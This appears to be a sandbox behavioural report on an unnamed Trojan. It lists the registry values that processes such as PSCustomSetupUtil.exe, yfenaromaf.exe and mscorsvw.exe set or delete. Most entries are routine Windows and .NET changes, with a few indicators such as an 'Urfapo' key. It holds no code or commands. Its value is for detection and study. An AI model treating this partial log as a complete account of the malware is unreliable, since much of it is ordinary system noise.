[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.ConsoleHost.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.ConsoleHost.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "AE 88 8B C1 AB F3 D0 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "197"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "198"
"StoreChangeIDFor64BitProcesses" = "176"
"StoreChangeIDFor32BitProcesses" = "197"

The process PSCustomSetupUtil.exe:2332 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D9 CB 5C 3C 74 35 6A 54 61 9C 64 BB C5 F2 10 23"

[HKLM\System\CurrentControlSet\Control\Session Manager\Environment]
"Path" = "C:\Perl\site\bin;C:\Perl\bin;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;c:\Program Files\Wireshark;%System%\WindowsPowerShell\v1.0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

The process PSCustomSetupUtil.exe:2556 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "37 AF 49 36 5B 22 39 C6 97 31 0F B9 8F 07 66 32"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.GPowerShell.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "0C C1 C7 CB AB F3 D0 01"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.GPowerShell.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "210"
"StoreChangeIDFor64BitProcesses" = "188"
"StoreChangeIDFor32BitProcesses" = "209"

The process PSCustomSetupUtil.exe:2140 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B5 10 5C DF FC B8 21 75 7A 16 45 66 D8 1A 28 0C"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Commands.Diagnostics.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "88 81 26 C2 AB F3 D0 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "201"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "202"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Commands.Diagnostics.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeIDFor64BitProcesses" = "180"
"StoreChangeIDFor32BitProcesses" = "201"

The process ipconfig.exe:1240 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "61 15 BF 2F B5 89 86 C3 D3 97 F1 32 28 D4 48 ED"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The process yfenaromaf.exe:1664 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D8 B5 A4 65 FC 46 B9 A5 42 20 16 46 A4 B9 81 35"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

The process PSSetupNativeUtils.exe:1932 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "00 B5 CC 46 EE 3D 80 2F 7C DD A3 03 C6 08 FA 9E"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
"Common Documents" = "%Documents and Settings%\All Users\Documents"
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The process mscorsvw.exe:4008 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "37 61 5F 71 73 90 CA ED 96 E6 BA BF D5 8B 56 3D"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

The process mscorsvw.exe:3128 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 0A 01 00 00 4D 00 69"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "0"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 02 01 00 00 4D 00 69"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 08 01 00 00 4D 00 69"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 F8 00 00 00 4D 00 69"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\State]
"AccumulatedWaitIdleTime" = "0"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D3 0F 67 71 89 16 30 A7 3B 8D 48 59 6B A9 72 32"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 1C 01 00 00 4D 00 69"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Runtime,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 EE 00 00 00 4D 00 69"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"

The process mscorsvw.exe:2592 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7df4ed04\40209899\66\InvertDependencies\56d30baa\41c113e9]
"5d" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\41c113e9\5d]
"DisplayName" = "Microsoft.PowerShell.Commands.Utility,1.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\3fcdfaca\10\InvertDependencies\56d30baa\41c113e9]
"5d" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\56d30baa\41c113e9]
"5d" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\643db07b\27\InvertDependencies\56d30baa\41c113e9]
"5d" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\41c113e9\5d]
"ILDependencies" = "7F 93 69 55 F3 DF 09 78 61 00 00 00 01 00 00 00"
"ConfigMask" = "4361"
"MVID" = "93 92 67 97 48 6D 4F 7A 9B 69 C5 87 5F F3 FC 30"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5d]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF F1"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF E1"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\41c113e9\5d]
"ConfigString" = "ZAP--0000-0000"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\30bc7c4f\1d498232]
"8" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7df4ed04\40209899\66]
"LastModTime" = "D0 21 40 C0 AB F3 D0 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\141dfd70\43970528\4b\InvertDependencies\56d30baa\41c113e9]
"5d" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\56d30baa\41c113e9]
"5d" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\56d30baa\41c113e9]
"5d" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\41c113e9\5d]
"Status" = "0"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7df4ed04\40209899\66]
"DisplayName" = "Microsoft.PowerShell.Commands.Utility,1.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\30041bb6\4c\InvertDependencies\56d30baa\41c113e9]
"5d" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\41c113e9\5d]
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5d]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF E1"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\56d30baa\41c113e9]
"5d" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF F1"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A3 30 BD F2 F8 D4 1E F0 A9 57 F4 3B B9 53 69 DD"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7df4ed04\40209899\66]
"SIG" = "EF D0 54 19 D0 F5 86 44 A9 62 4E 86 6A 5F 6C 6E"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "93"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7df4ed04\40209899\66]
"Status" = "4098"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"

The Trojan deletes the following registry key(s):

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5b]

The process mscorsvw.exe:2732 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2B BF 44 4A 6C FA 52 B2 10 EC 05 A2 E2 3F 31 5A"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
